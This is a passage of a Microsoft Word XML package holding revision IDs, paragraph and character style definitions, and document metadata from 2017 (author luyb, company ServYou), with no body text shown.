    <w:rsid w:val="009701D2"/>
    <w:rsid w:val="009B4338"/>
    <w:rsid w:val="009E1FC5"/>
    <w:rsid w:val="009E39E4"/>
    <w:rsid w:val="00A220D1"/>
    <w:rsid w:val="00A25AB1"/>
    <w:rsid w:val="00A27972"/>
    <w:rsid w:val="00A30E62"/>
    <w:rsid w:val="00A35015"/>
    <w:rsid w:val="00A51E3F"/>
    <w:rsid w:val="00A5489B"/>
    <w:rsid w:val="00A5637A"/>
    <w:rsid w:val="00A66FD7"/>
    <w:rsid w:val="00A7430E"/>
    <w:rsid w:val="00A760E8"/>
    <w:rsid w:val="00A91DDA"/>
    <w:rsid w:val="00AA55FF"/>
    <w:rsid w:val="00AB0D5F"/>
    <w:rsid w:val="00AB1FCC"/>
    <w:rsid w:val="00AB7DB3"/>
    <w:rsid w:val="00AD58DC"/>
    <w:rsid w:val="00B003D4"/>
    <w:rsid w:val="00B511DA"/>
    <w:rsid w:val="00B62272"/>
    <w:rsid w:val="00B671A3"/>
    <w:rsid w:val="00B7479B"/>
    <w:rsid w:val="00B93E8C"/>
    <w:rsid w:val="00BA734F"/>
    <w:rsid w:val="00BC3C0E"/>
    <w:rsid w:val="00BE4860"/>
    <w:rsid w:val="00BF0AB7"/>
    <w:rsid w:val="00C05155"/>
    <w:rsid w:val="00C26930"/>
    <w:rsid w:val="00C43F3A"/>
    <w:rsid w:val="00C7704D"/>
    <w:rsid w:val="00C85E02"/>
    <w:rsid w:val="00CB5EC2"/>
    <w:rsid w:val="00D050D4"/>
    <w:rsid w:val="00D16C7A"/>
    <w:rsid w:val="00D33A90"/>
    <w:rsid w:val="00D35DBA"/>
    <w:rsid w:val="00D41E6E"/>
    <w:rsid w:val="00D54369"/>
    <w:rsid w:val="00DC096F"/>
    <w:rsid w:val="00DD1DFA"/>
    <w:rsid w:val="00DF3046"/>
    <w:rsid w:val="00DF3712"/>
    <w:rsid w:val="00DF77D3"/>
    <w:rsid w:val="00E24819"/>
    <w:rsid w:val="00E31ADA"/>
    <w:rsid w:val="00E47EF4"/>
    <w:rsid w:val="00E76F09"/>
    <w:rsid w:val="00EA06E8"/>
    <w:rsid w:val="00EB55F2"/>
    <w:rsid w:val="00EE0E7B"/>
    <w:rsid w:val="00F52FCF"/>
    <w:rsid w:val="00F83E21"/>
    <w:rsid w:val="00FA3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3640CE-C158-45A9-84DF-CBC4EF9F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73A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53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7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568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53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53E9"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004153E9"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004153E9"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004153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17599"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00073AE3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004C74FD"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLChar">
    <w:name w:val="HTML 预设格式 Char"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006E6798"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006E6798"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006E6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pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLChar1">
    <w:name w:val="HTML 预设格式 Char1"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006E6798"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000568D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inbreak.net/a.j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827</Words>
  <Characters>4719</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>39</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>ServYou</Company>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luyb</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>luyb</cp:lastModifiedBy>
  <cp:revision>246</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-25T16:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-26T11:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>